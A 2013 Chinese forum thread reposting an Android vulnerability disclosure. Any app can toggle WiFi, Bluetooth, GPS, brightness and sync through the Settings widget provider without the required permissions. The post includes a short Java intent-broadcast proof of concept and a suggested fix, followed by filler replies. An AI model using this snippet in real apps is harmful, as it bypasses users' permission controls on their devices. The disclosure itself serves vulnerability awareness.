查看: 3172|回复: 24

Android平台曝随意开启和关闭手机wifi功能漏洞

[复制链接]
发表于 2013-3-10 01:42:27 | 显示全部楼层 |阅读模式

披露状态:


2013-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:
Settings应用含有com.android.settings.widget.SettingsAppWidgetProvider,其伴随有onReceive方法来实现相关功能的开启和关闭;然而问题是,任何应用都可以直接发送带有此方法的intent从而启动/关闭相应功能。

详细说明:
此漏洞已经在http://code.google.com上举报:
http://code.google.com/p/android/issues/detail?id=14602&q=exploit&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars

不知此漏洞网站上有无,仅为得号!!!

漏洞证明:
发送下面的intent信息可以让应用触发WiFi, Bluetooth, and location provider states ,且不需要相关申请权限(CHANGE_WIFI_STATE, BLUETOOTH_ADMIN, and ACCESS_FINE_LOCATION, respectively):

Intent intent = new Intent("test");
intent.setClassName("com.android.settings",
"com.android.settings.widget.SettingsAppWidgetProvider");
intent.addCategory(Intent.CATEGORY_ALTERNATIVE);
intent.setData(Uri.fromParts("0", "0", "0")); // 0 is for WiFi
sendBroadcast(intent);

Change 0 to 3 for GPS and 4 for Bluetooth. You can also toggle Brightness and Sync settings with 1 and 2, respectively.

修复方案:
对此com.android.settings.widget.SettingsAppWidgetProvider组件添加权限

发表于 2013-3-10 02:56:57 | 显示全部楼层
又看了一次  
发表于 2013-3-11 09:56:05 | 显示全部楼层
几头雾水…  
发表于 2013-3-11 11:13:49 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2013-3-16 15:23:00 | 显示全部楼层
有才的不在少数啊  
发表于 2013-3-18 02:28:31 | 显示全部楼层
问渠哪得清如许,为有源头活水来。  
发表于 2013-3-19 01:28:45 | 显示全部楼层
不错,看看。  
发表于 2013-3-22 00:52:55 | 显示全部楼层
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
发表于 2013-3-22 07:05:12 | 显示全部楼层
一个鸡蛋跑到青藏高原,结果它变成了氢弹;  
发表于 2013-3-24 20:00:18 | 显示全部楼层
不错,感谢楼主
高级模式
B Color Image Link Quote Code Smilies

本版积分规则